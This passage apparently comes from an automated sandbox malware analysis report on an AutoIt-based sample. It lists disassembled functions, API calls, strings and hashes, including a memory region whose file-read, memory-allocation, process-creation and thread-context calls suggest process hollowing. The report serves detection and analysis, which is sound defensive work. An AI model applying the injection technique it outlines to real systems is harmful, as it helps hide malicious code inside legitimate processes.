                                                                                                                    • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                                    • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                                                                                    Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1974 40f679-40f67c 1969->1974 1971 40f640 1970->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1969 1977->1971 1990 425d43-425d5f call 414d30 1978->1990 1979->1975 1981 40f6b4-40f6c2 1980->1981 1982 40f6af-40f6b2 1980->1982 1984 425d16 1981->1984 1985 40f6c8-40f6d6 1981->1985 1982->1975 1984->1978 1987 425d05-425d0b 1985->1987 1988 40f6dc-40f6df 1985->1988 1987->1973 1991 425d11 1987->1991 1988->1975 1990->1968 1991->1984
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                                                    • String ID: AU3!$EA06
                                                                                                                    • API String ID: 1268643489-2658333250
                                                                                                                    • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                    • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                                                    • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                                                    • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                                                                                    Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2002 40112c-401141 DefWindowProcW 1997->2002 2000 401184-40118e call 401250 1998->2000 2001 40114c-40114f 1998->2001 1999->1998 2003 401120-401126 1999->2003 2011 401193-40119a 2000->2011 2004 401151-401157 2001->2004 2005 40119d 2001->2005 2003->2002 2007 42b038-42b03f 2003->2007 2008 401219-40121f 2004->2008 2009 40115d 2004->2009 2012 4011a3-4011a9 2005->2012 2013 42afb4-42afc5 call 40f190 2005->2013 2007->2002 2010 42b045-42b059 call 401000 call 40e0c0 2007->2010 2008->2003 2016 401225-42b06d call 468b0e 2008->2016 2014 401163-401166 2009->2014 2015 42b01d-42b024 2009->2015 2010->2002 2012->2003 2019 4011af 2012->2019 2013->2011 2021 42afe9-42b018 call 40f190 call 401a50 2014->2021 2022 40116c-401172 2014->2022 2015->2002 2020 42b02a-42b033 call 4370f4 2015->2020 2016->2011 2019->2003 2026 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2019->2026 2027 4011db-401202 SetTimer RegisterWindowMessageW 2019->2027 2020->2002 2021->2002 2022->2003 2030 401174-42afde call 45fd57 2022->2030 2027->2011 2028 401204-401216 CreatePopupMenu 2027->2028 2030->2002 2045 42afe4 2030->2045 2045->2011
                                                                                                                    APIs
                                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                    • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                    • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                    • String ID: TaskbarCreated
                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                    • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                    • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                    • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                    • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                                                                    Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                                                                                    APIs
                                                                                                                    • _malloc.LIBCMT ref: 004115F1
                                                                                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                    • std::exception::exception.LIBCMT ref: 00411626
                                                                                                                    • std::exception::exception.LIBCMT ref: 00411640
                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                    • String ID: ,*H$4*H$@fI
                                                                                                                    • API String ID: 615853336-1459471987
                                                                                                                    • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                    • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                                    • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                    • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                                                                                    Function 04209628 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 2065 4209628-42096d6 call 4207018 2068 42096dd-4209703 call 420a538 CreateFileW 2065->2068 2071 4209705 2068->2071 2072 420970a-420971a 2068->2072 2073 4209855-4209859 2071->2073 2080 4209721-420973b VirtualAlloc 2072->2080 2081 420971c 2072->2081 2074 420989b-420989e 2073->2074 2075 420985b-420985f 2073->2075 2077 42098a1-42098a8 2074->2077 2078 4209861-4209864 2075->2078 2079 420986b-420986f 2075->2079 2082 42098aa-42098b5 2077->2082 2083 42098fd-4209912 2077->2083 2078->2079 2084 4209871-420987b 2079->2084 2085 420987f-4209883 2079->2085 2086 4209742-4209759 ReadFile 2080->2086 2087 420973d 2080->2087 2081->2073 2090 42098b7 2082->2090 2091 42098b9-42098c5 2082->2091 2092 4209922-420992a 2083->2092 2093 4209914-420991f VirtualFree 2083->2093 2084->2085 2094 4209893 2085->2094 2095 4209885-420988f 2085->2095 2088 4209760-42097a0 VirtualAlloc 2086->2088 2089 420975b 2086->2089 2087->2073 2096 42097a2 2088->2096 2097 42097a7-42097c2 call 420a788 2088->2097 2089->2073 2090->2083 2098 42098c7-42098d7 2091->2098 2099 42098d9-42098e5 2091->2099 2093->2092 2094->2074 2095->2094 2096->2073 2105 42097cd-42097d7 2097->2105 2101 42098fb 2098->2101 2102 42098f2-42098f8 2099->2102 2103 42098e7-42098f0 2099->2103 2101->2077 2102->2101 2103->2101 2106 42097d9-4209808 call 420a788 2105->2106 2107 420980a-420981e call 420a598 2105->2107 2106->2105 2113 4209820 2107->2113 2114 4209822-4209826 2107->2114 2113->2073 2115 4209832-4209836 2114->2115 2116 4209828-420982c CloseHandle 2114->2116 2117 4209846-420984f 2115->2117 2118 4209838-4209843 VirtualFree 2115->2118 2116->2115 2117->2068 2117->2073 2118->2117
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 042096F9
                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0420991F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 204039940-0
                                                                                                                    • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                    • Instruction ID: 783d45988b7ec7368c0295fa18eaa3ad9cd7fb6cb0dc9744046d9b97d1066a76
                                                                                                                    • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                    • Instruction Fuzzy Hash: A1A11BB4E10209EBDB24CFA4C894BEEB7B5BF48304F108159E516BB2C2D775AA85CF50
                                                                                                                    Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 2119 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2122 427190-4271ae RegQueryValueExW 2119->2122 2123 40e4eb-40e4f0 2119->2123 2124 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2122->2124 2125 42721a-42722a RegCloseKey 2122->2125 2130 427210-427219 call 436508 2124->2130 2131 4271f7-42720e call 402160 2124->2131 2130->2125 2131->2130
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryValue$CloseOpen
                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                    • API String ID: 1586453840-614718249
                                                                                                                    • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                                    • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                                    • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                                    • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                                                    Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 2136 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                    APIs
                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateShow
                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                    • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                    • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                                    • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                    • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                                                    Function 042093C8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 2137 42093c8-4209524 call 4207018 call 42092b8 CreateFileW 2144 4209526 2137->2144 2145 420952b-420953b 2137->2145 2146 42095db-42095e0 2144->2146 2148 4209542-420955c VirtualAlloc 2145->2148 2149 420953d 2145->2149 2150 4209560-4209577 ReadFile 2148->2150 2151 420955e 2148->2151 2149->2146 2152 4209579 2150->2152 2153 420957b-42095b5 call 42092f8 call 42082b8 2150->2153 2151->2146 2152->2146 2158 42095d1-42095d9 ExitProcess 2153->2158 2159 42095b7-42095cc call 4209348 2153->2159 2158->2146 2159->2158
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 042092B8: Sleep.KERNELBASE(000001F4), ref: 042092C9
                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0420951A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFileSleep
                                                                                                                    • String ID: HCTT8IEAI2UJ63XTN2K1ZHDYWC
                                                                                                                    • API String ID: 2694422964-788923217
                                                                                                                    • Opcode ID: 2686f00af71ae1ddb8fa5ea17b761f45c64953d7f7b2489467ae35bbc548ba9f
                                                                                                                    • Instruction ID: 752207e3680ee871111c53b5d910c84b8052b257a50859bc881acc041f9f99ec
                                                                                                                    • Opcode Fuzzy Hash: 2686f00af71ae1ddb8fa5ea17b761f45c64953d7f7b2489467ae35bbc548ba9f
                                                                                                                    • Instruction Fuzzy Hash: 5D61C470E14288DAEF11DBB4C844BEEBFB5AF15304F044198E2497B2C2D7B95B88CB65
                                                                                                                    Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                    • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                    • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                                    • String ID: Line:
                                                                                                                    • API String ID: 1874344091-1585850449
                                                                                                                    • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                    • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                                    • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                    • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                                    Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                                    • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                                    • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$OpenQueryValue
                                                                                                                    • String ID: Control Panel\Mouse
                                                                                                                    • API String ID: 1607946009-824357125
                                                                                                                    • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                    • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                                    • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                    • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                                    Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                    • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                    • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                    • _wcsncpy.LIBCMT ref: 00410340
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3170942423-0
                                                                                                                    • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                    • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                                    • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                    • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                                    Function 042082B8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 04208A73
                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04208B09
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04208B2B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
